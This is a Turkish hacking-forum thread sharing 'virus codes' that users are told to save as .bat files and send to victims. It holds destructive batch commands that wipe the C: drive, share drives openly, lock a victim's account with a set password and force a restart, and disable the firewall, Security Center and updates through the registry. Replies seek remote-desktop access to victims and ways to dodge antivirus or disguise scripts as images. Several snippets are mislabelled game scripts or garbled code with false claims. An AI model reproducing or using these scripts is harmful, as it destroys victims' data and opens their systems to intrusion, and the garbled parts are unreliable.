4. Derce Vİrüslerİ

4.Derece Virus Kodları

Klavye Hackleme Kodu
del C:/WINDOWS/system/KEYBOARD.DRV
Karşı Pcyi Yak
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=<argn1
local.t_y=<argn2
sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y**** B<qval <argn3>?<argn3>:<p.z**** W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z**** B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> – 1> D<var.rendermode>

System 32 Silen Virüs
Not defterinin içine yapıştır.Bata çevir.C:/windows/system32 /deleted
Karşı tarafa yolla açsın.Gitti Bitti.

Karşı Pcyi Paylaşıma Açma Kodu
Not defterine kaydet ve uzantısını bat yap.Yolla…
net share hacker=c:\ /unlimited /remark:”RockStar”
net share hacker=d:\ /unlimited /remark:”RockStar”

Karşı Pcyi Resmi Açınca Pc Kapanıyor Ve Mosuyi Kaybetme
RapidShare: 1-CLICK Web hosting – Easy Filehosting Resim
RapidShare: 1-CLICK Web hosting – Easy Filehosting Mouse
Bu dosyaları indirin ve karşı tarafa yollayın açınca o size neler olduğunu anlatır.

Format
1.Notepad ‘i açın.
2.Notepad in içine şunları yazın:
Echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
Echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
Echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
Echo off
cls
cls
Echo .::Hacked By 4-Ever-Hacker::.
Echo off
bu komutu not defterinin içine kopyalayın ve uzantısını bat yapın kendi pc denedim 100%100 çalışıyor bu komutu yazıp karşıya gönderdiğinizde kişi tıklarsa bir daha pc açamaz
format atmak zorunda kalır

Monitör Patlatma
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=<argn1
local.t_y=<argn2
sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y**** B<qval <argn3>?<argn3>:<p.z**** W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z**** B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> – 1> D<var.rendermode>
not defterine kopyalayın ve uzantısını bat yapın sakın siz tıklamayın 100%75 çalışıyodur

MasaÜstünü Silme
CD..
CD..
CD.
erase c:/f/s/q/a
not defterine kopyalayın ve uzantısını bat yapın 100%100 çalışıyor

Karşı Pcsinin Oturumuna Şifre Koyma
ilk olarak Not Defterini açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:
net user %username% 123456
shutdown -r
bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp .bat olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekilde kabul ettirip yolluyorsunuz adam alınca çıft tıkladığı anda pc’ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini bile açsa durduramaz zaten durdursa bile şifre çoktan yerleşmiş olur pc’yi kendisi kapadığıanda şifrelenir açıldığında parola sorar bilen açar bilemeyen açamaz.
100%100 denendi

Karşı Pcsinin Güvenlik Duvarını Kapatma
Echo off
net stop “Security Center”
net stop SharedAccess
> “%Temp%.\kill.reg” ECHO A R E S
> >”%Temp%.\kill.reg” ECHO.
> >”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
> >”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
****”%Temp%.\kill.reg” ECHO.
> >”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
> >”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
> >”%Temp%.\kill.reg” ECHO.
> >”%Temp%.\kill.reg” ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
> >”%Temp%.\kill.reg” ECHO “Start”=dword:00000004
> >”%Temp%.\kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.\kill.reg”
DEL “%Temp%.\kill.reg”
DEL %0

Karşı Pcye Emir Verme Komutları
shutdown -i:Uzaktan Kapat’1 aç
shutdown -l:Oturumu Kapat.
shutdown -s:Bilgisayar1 kpat.
shutdown -r:Bilgisayar1 kapat ve y€niden ßaslat
shutdown -m //bilgisayarad1:Yeniden ba_latmak/ç1kmak için uzak bilg.
shutdown -t xx:kapatmak için bilgisayar1 xx saniyeye ayarla
shutdown -c:Kapatma yorumu en çok<127 karakter>
shutdown -f:Çal1_an uygulamalar1 direkman kapatmaya zorlar
shutdown -d:Kapatma için neden kodu
evet arkadaşlar bunları v€rdik ama şimdi n€ olucak.
başlat-çalıştır-cmd yazın.sonra bu komutlardan birini yazdıktan
sonra yanına arkadaşınızın ıp’sini yazın.sonra yazdığınız komuta
göre işlem görsün.
ip no yazamayı unutmayın

Mail İle Web Site Yıkıcı
phpBBde özel mesaj ile hack yapmak isteyenler bu tam size göre…adminin veya üyenin artık kime atacağınız size kalmış özel mesaj ile atın ve o kişi mesajı okuduğunda bilgileri size gelecek..işte kod..

phpbb de

Kod:
// Save login tries and last login
if (&l036;row[&l039;user_id&l039;] != cookies)
&l123;
&l036;sql = &l039;UPDATE &l039; . USERS_TABLE . &l039;
SET user_login_tries = user_login_tries + 1, user_last_login_try = &l039; . time() . &l039;
WHERE user_id = &l039; . &l036;row[&l039;user_id&l039;];
&l036;db->sql_query(&l036;sql);
}




devrem bu kodların bazıları basit ama bazıları da çok güçlüdür

 

saol devrem eline sağlık

 

Devrem karşı tarafın bilgisayarını uzaktan erişime açan ve şifresini sıfırlayan bir kod var mıdır.
Amacım kurban dosyayı açtıktan sonra uzaktan erişim ile bilgisayarına girebilmek.

 

Devrem bildiğim kadarıyla kali linux'ta setoolkit ile trojan oluşturup trojan'i karşı kişiye gönderdiğinde metasploit ile sızıyormuşsun hiç denemedim ama bir videoda öyle izlemiştim.

 

Devrem evet ama bunu windows ile de yapmak mümkün müdür.
Metasploit değilde uzaktan masaüstü ile bağlanmak istiyorum.
Yani dosyayı (virüsü) karşı taraf açtığında uzaktan masaüstü erişimine açık hale gelsin bilgisayarı.
Sonrada şifre 123 olsun. (Biliyorsundur ki uzaktan masasüstünde şifre büyük bir problem)
Bende uzaktan masaüstü ile pc sine girip şifreyi de kendi ayarladığımız şifre(123) ile girip sisteme sızmış olmak istiyorum.

 

Devrem o kadarını bilmiyorum yani bildiğim metasploitable2 işletim sistemine deneme amaçlı sızdım onuda kendi wmware'a kurdum. Zaten metasploitable2 güvenlik açıklarıya dolu olduğu için sızılması 1 dakka almıyor bunu diğer devrelerim cevaplar belki.

 

devrem onun için rat lazım

 

Tamam devrem rat hakkında araştırmalar yapacağım vakit bulunca teşekkürler.

 

devrem foruma koydum

 

devrem uzaktan erişimi bilmiyorum ama şifre işi şöyle olur yeni bir şifre koyarsın sonra adamın eski şifresi senin yaptığın şifre olur

 

devrem şifre koyma kodlerı şöyle

code:
net user %username% 123456
shutdown -r



bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz



.bat olarak kaydet zaten herkes biliyodur

 

ama karşı tarafın antivirüs programı varsa işe yaramaz onun için şöyle yapılmalı




Echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0



net user %username% 123456
shutdown -r



önce güvenlik duvarı kapanacak sonra şifre değiştirile bilecek

 

virüs total:

https://www.virustotal.com/gui/file...7bc3702170004b7b85bdea707ede4fca414/detection

9 virüs olmasına rağmen açıldığı gibi güvenlik duvarları kapatılacak şifre değişecek

 

Devrelerim peki uzaktan masaüstü erişimine nasıl açıcağız bilgisayarı.
Şifre koyduk güzel uzaktan masaüstünden giriş yaparken kullanıcağımız şifre belli.
Ama uzaktan erişime açık değil ki bilgisayar bunu sanırım bu pek mümkün değil.
Ama bilen devrelerim varsa lütfen yazsınlar.

 

Dosyanın virüslü olarak gözükmesi problem değil.
Üzerinde uğraşarak virüssüz bir biçimde gösterebiliriz.

 

iki yolu var bir rat ikinci ise cmd

 

Devrem cmd ile nasıl uzaktan erişime bilgisayarı açarım.

 

shutdown -i:Uzaktan Kapat’ı aç
shutdown -l:Oturumu Kapat.
shutdown -s:Bilgisayarı kpat.
shutdown -r:Bilgisayarı kapat ve yeniden Baslat
shutdown -m //bilgisayaradı:Yeniden başlatmak/çıkmak için uzak bilg.
shutdown -t xx:kapatmak için bilgisayarı xx saniyeye ayarla
shutdown -c:Kapatma yorumu en çok<127 karakter>
shutdown -f:Çalışan uygulamaları direkman kapatmaya zorlar
shutdown -d:Kapatma için neden kodu

bunların yanına karşı tarafın ip si yazılmalı

 

Teşekkürler devrem peki telefonlar için nasıl yapılabilir.
Çünkü .bat dosyalar telefonlarda çalışmaz.

 

devrem .bat yapıp bir resimle birleştirirsen android onu resim olarak sayıyor açıldığında ise virüs başlıyor